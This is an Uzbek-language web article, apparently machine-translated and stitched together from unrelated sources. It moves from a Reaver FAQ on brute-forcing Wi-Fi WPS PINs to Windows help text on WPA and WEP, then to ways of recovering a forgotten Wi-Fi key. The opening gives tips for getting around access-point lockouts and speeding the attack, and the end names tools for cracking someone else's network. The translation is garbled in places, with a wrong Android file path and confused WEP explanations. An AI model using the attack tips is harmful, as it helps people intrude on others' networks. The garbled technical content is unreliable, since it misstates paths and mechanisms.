Savol: Nega men tezlikni cheklashda aniqlangan xatolarni olishda davom etaman? Javob: Buning sababi, kirish nuqtasi WPS-ni bloklagan. Odatda bu vaqtinchalik blok (taxminan besh daqiqa), ammo ba'zi hollarda doimiy taqiq ham qo'yilishi mumkin (blokdan chiqarish faqat ma'muriy panel orqali). Reaver 1.3 versiyasida bitta noxush xato mavjud, shuning uchun bunday qulflarning chiqarilishi aniqlanmagan. Ish davri sifatida "-ignore-locks" parametridan foydalanish yoki SVN-dan so'nggi versiyasini yuklab olish tavsiya etiladi.

Savol: Hujumni tezlashtirish uchun bir vaqtning o'zida ikkita yoki undan ortiq Reaver nusxalarini ishga tushirsam bo'ladimi?

Javob: Nazariy jihatdan, bu mumkin, ammo agar ular bir xil kirish nuqtasida bolg'a bosishsa, unda qo'pol kuch tezligi deyarli oshmaydi, chunki bu holda u bitta tajovuzkor bilan to'liq yuklangan kirish nuqtasining zaif apparati bilan cheklangan.

Simsiz tarmoqdagi shaxsiy ma'lumotlar va fayllarga ba'zan begona odamlar tarmoq signalini ushlab kirishlari mumkin. Bu shaxsni o'g'irlash va boshqa zararli harakatlarga olib kelishi mumkin. Tarmoq xavfsizligi kaliti yoki parol sizning simsiz tarmog'ingizni bunday ruxsatsiz kirishdan himoya qilishga yordam beradi.

Xavfsizlik kalitini sozlash uchun Tarmoqni o'rnatish ustasidagi ko'rsatmalarga amal qiling.

Eslatma.

  • Simsiz tarmoqni himoya qilish uchun WEP-dan foydalanishni tavsiya etmaymiz. Xavfsiz Wi-Fi himoyalangan kirish (WPA yoki WPA2). Agar ular WPA va WPA2 dan foydalanishda ishlamasa, tarmoq adapterini WPA yoki WPA2 ni qo'llab-quvvatlaydigan adapter bilan almashtirish tavsiya etiladi. Barcha tarmoq qurilmalari, kompyuterlar, marshrutizatorlar va kirish nuqtalari WPA yoki WPA2 ni qo'llab-quvvatlashi kerak.

Simsiz tarmoqlar uchun shifrlash usullari

Bugungi kunda simsiz shifrlashning uch turi mavjud: Wi-Fi himoyalangan kirish (WPA va WPA2), simli ekvivalent maxfiylik (WEP) va 802.1x. Birinchi ikkita usul quyidagi bo'limlarda batafsil bayon etilgan. 802.1x odatda korporativ tarmoqlarda qo'llaniladi va bu erda qamrab olinmagan.

Wi-Fi himoyalangan kirish (WPA va WPA2)

WPA va WPA2 foydalanuvchidan ulanish uchun xavfsizlik kalitini taqdim etishni talab qiladi. Kalit tekshirilgandan so'ng, kompyuter yoki qurilma va kirish nuqtasi o'rtasida uzatiladigan barcha ma'lumotlar shifrlanadi.

WPA autentifikatsiyasining ikki turi mavjud: WPA va WPA2. Imkon qadar WPA2-dan foydalaning, chunki u maksimal darajada xavfsizlikni ta'minlaydi. Deyarli barcha yangi simsiz adapterlar WPA va WPA2-ni qo'llab-quvvatlaydi, ammo ba'zi eski modellar buni qo'llab-quvvatlamaydi. WPA-Personal va WPA2-Personal barcha foydalanuvchilarga bir xil parolni tayinlaydi. Ushbu rejim uy tarmoqlari uchun tavsiya etiladi. WPA-Enterprise va WPA2-Enterprise barcha foydalanuvchilarga turli xil kalitlarni taqdim etadigan 802.1x autentifikatsiya serverida foydalanish uchun mo'ljallangan. Ushbu rejim birinchi navbatda ish tarmoqlarida qo'llaniladi.

WEP (Simli tenglashtirilgan maxfiylik)

WEP - bu tarmoqni himoyalashning eski usuli. Eski qurilmalarni qo'llab-quvvatlash uchun hali ham mavjud, ammo tavsiya etilmaydi. WEP yoqilganda, tarmoq xavfsizligi kaliti sozlanadi. Ushbu kalit kompyuterning tarmoq orqali boshqa kompyuterlarga uzatadigan ma'lumotlarini shifrlaydi. Biroq, WEP xavfsizligini sindirish nisbatan oson.

WEP xavfsizligining ikki turi mavjud: ochiq tizim autentifikatsiyasi va umumiy kalitlarni tasdiqlash. Ularning hech biri yuqori darajadagi xavfsizlikni ta'minlamaydi, ammo ochiq kalitni tasdiqlash usuli unchalik xavfsiz emas. Ko'pgina kompyuterlar va simsiz ulanish nuqtalari uchun umumiy kalitni tasdiqlash tarmoqni xavfsizligini ta'minlash uchun ishlatiladigan statik WEP shifrlash kaliti bilan bir xil. Muvaffaqiyatli ochiq kalitni tasdiqlash uchun xabarlarni ushlab turadigan tajovuzkor ochiq kalitni tasdiqlash kalitini va keyin statik WEP shifrlash kalitini aniqlash uchun tahlil vositalaridan foydalanishi mumkin. Statik WEP shifrlash kaliti aniqlangandan so'ng, tajovuzkor tarmoqqa to'liq kirish huquqiga ega bo'lishi mumkin. Shu sababli, Windows-ning ushbu versiyasi umumiy WEP kalit autentifikatsiyasi yordamida tarmoq konfiguratsiyasini avtomatik ravishda qo'llab-quvvatlamaydi.

Agar ushbu ogohlantirishlarga qaramay, birgalikda WEP kalitlari yordamida autentifikatsiya qilish zarur bo'lsa, quyidagi bosqichlarni bajaring.

Ko'rinib turibdiki, ko'pchilik foydalanuvchilar simsiz tarmoqqa ulanishda tizim ularni tarmoq xavfsizligi deb nomlangan kalitni kiritishni talab qiladigan vaziyatga duch kelgan deb aytish mantiqsiz.

Bu nima, nima uchun ishlatiladi va uni qanday topish mumkin, shunda suhbat davom etadi. Wi-Fi orqali ulanish uchun o'rnatilgan kombinatsiyani unutganlarga ham yordam beradigan asosiy harakatlar uchun bir nechta variantlarni ko'rib chiqamiz.

Wi-Fi xavfsizlik kaliti: bu nima va u nima uchun ishlatiladi?

Keling, ta'rifning o'zi bilan boshlaymiz. tarmoq xavfsizligi, mutlaqo barcha kompyuterlar va mobil qurilmalar foydalanuvchilari bilishadi. Abstrusiya nomiga qarab, hamma ham nima haqida ekanligini aniqlay olmaydi.

Aslida, bu simsiz sozlamalarda o'rnatilgan parol, boshqasi uni ishlatmasligi va maxfiy ma'lumotlarga kirish huquqiga ega bo'lmasligi uchun, masalan, fayllarni va papkalarni almashish bilan uy simsiz tarmoqlarini tashkil qilishda.

Tarmoq xavfsizligi kalitini qaerdan olish mumkin: variantlar

Ko'pgina foydalanuvchilar simsiz ulanish sozlamalarini provayder mutaxassislariga yoki begonalarga ishonib topshirish bilan ko'pincha yaratilgan parolni yozishni unutishadi. Va shundan keyingina, masalan, muhim nosozliklardan so'ng tizimni tiklashda yoki uni to'liq qayta o'rnatishda, ular ulanish uchun kerakli kombinatsiyani eslab, kalitni qanday topish kerakligini aniqlab, tirsaklarini tishlaydilar: Buning uchun siz quyidagi amallarni bajarishingiz mumkin:

  • statsionar kompyuterlar va noutbuklar uchun Windows tizimlari uchun tarmoq vositalari;
  • yo'riqnoma parametrlarini sozlash;
  • uchinchi tomon dasturlari;
  • birovning aloqasi parolini hisoblash uchun qo'pol kuch (qo'pol kuch ishlatish).

Agar dastlabki uchta variant standart bo'lsa va barcha Windows tizimlarida ishlatilsa va kalit mobil qurilma orqali aniqlansa, u holda qonuniylik yoki axloqiy-axloqiy nuqtai nazardan qo'pol kuch ishlatilishini noqonuniy deb tasniflash mumkin. Barcha variantlarni, shu jumladan qo'pol aralashuvni, lekin faqat umumiy ma'lumot uchun ko'rib chiqing.

Ulanish sozlamalarini ishlatish

Shunday qilib, foydalanuvchi kompyuterida yoki noutbukda tuzilgan ulanish uchun o'rnatilgan tarmoq xavfsizligi kalitini qanday topish mumkin?

Oddiy holatda, Windows 7 va undan past operatsion tizimlar bilan ishlashda, joriy ulanishning xususiyatlarini chaqirgandan so'ng, xavfsizlik yorlig'i bilan kerakli bo'lim darhol ochiladi, bu erda sukut bo'yicha yulduzcha yoki nuqta sifatida ko'rsatilgan parolni kiritish maydoni ostida siz kiritilgan belgilarni ko'rsatish uchun katakchani belgilashingiz kerak ... Ushbu bosqichlarni bajargandan so'ng, tarmoq xavfsizligi kaliti yozilishi, ko'chirilishi yoki saqlanishi mumkin, masalan, matnli faylda.

Xuddi shunday, siz standart "Boshqarish paneli" da joylashgan "Tarmoq va almashish markazi" da kerakli parametrlarga kirishingiz mumkin (Windows 10-da, "Ishga tushirish" konsolida boshqarish buyrug'ini chaqirish eng oson). Bu erda siz ulanishni tanlaysiz, simsiz xususiyatlarga o'ting va bir xil xavfsizlik yorlig'idan foydalaning.

Router sozlamalarida xavfsizlik kalitlari haqida ma'lumot

Xuddi shunday sodda, Wi-Fi tarmog'ining xavfsizlik kalitini yo'riqnoma sozlamalarida topish mumkin. Buning uchun, avvalo, mavjud bo'lgan har qanday brauzer orqali yo'riqchining veb-interfeysini kiriting, oxirida 192.168.0.1 yoki 1.1 kabi kombinatsiyani manzil satriga kiriting, login va parolni kiriting (odatda ikkala maydon uchun administrator) va keyin simsiz xavfsizlik menyusiga o'ting. (Simsiz xavfsizlik).

Bu erda PSK paroli yoki ushbu ruhdagi boshqa bir narsa sifatida belgilangan maxsus maydon ko'rsatiladi, bu erda kerakli kirish kombinatsiyasi ta'kidlanadi.

Mobil qurilmalarda kirish parolini qanday topishim mumkin?

Mobil qurilmalarga kelsak, siz parolni ko'rsatish maydonini faollashtirishdan foydalanishingiz mumkin. Biroq, har doim ham tarmoq xavfsizligi kalitini shu tarzda aniqlash mumkin emas. Android operatsion tizimlarida parol etarlicha chuqur yashiringan, uni root huquqisiz topish juda muammoli bo'lishi mumkin. Shunga qaramay, agar siz ularni o'rnatsangiz, masalan, Kingo Root drayverini o'rnatib, o'zingizga superuser huquqlarini ta'minlasangiz, hech qanday muammo bo'lmaydi.

Bunday holda, sizga qo'shimcha ravishda Root Explorer kabi ba'zi bir fayl menejerlarini o'rnatishingiz kerak, ichki diskdagi data \\ music \\ wifi yo'liga o'ting, u erda wpa_supplicant.conf konfiguratsiya faylini toping, uni matnli hujjatlar bilan ishlash uchun har qanday dastur bilan oching (brauzer yoki o'rnatilgan). menejeri vositasi) va kerakli tarmoq nomini (SSID) toping. Ismning yonida va kirish uchun foydalanilgan kerakli tarmoq xavfsizligi kaliti ko'rsatilgan.

Shuningdek, siz WiFi parol kabi maxsus dasturlardan foydalanishingiz mumkin, ular qo'ng'iroq qilingandan so'ng ushbu qurilmadan qilingan barcha ulanishlar ko'rsatiladi. Bundan tashqari, faqat tarmoq xavfsizligi kalitini ko'rsatish maydonini faollashtirish va kerakli ma'lumotlarni ko'rish qoladi.

Eslatma: Windows tizimiga o'xshash mobil qurilmalarda brauzer orqali siz ishlatilgan yo'riqnoma sozlamalarini kiritishingiz va uning parametrlarida parolni ko'rishingiz mumkin. Ammo bu juda noqulay.

Birovning ulanishi uchun parolni hisoblash

Brute-force-ga kelsak, ko'p hollarda parollarni buzish uchun maxsus dasturlardan foydalaniladi.

Windows uchun eng mashhur yordamchi dastur Aircrack-ng va Android tizimlarida ishlaydigan mobil qurilmalar uchun WBR dasturi. Aniq sabablarga ko'ra ulardan foydalanish bilan bog'liq savollar va batafsil ko'rsatmalar qamrab olinmagan.

Maqola sizga yoqdimi? Do'stlar bilan bo'lishish uchun: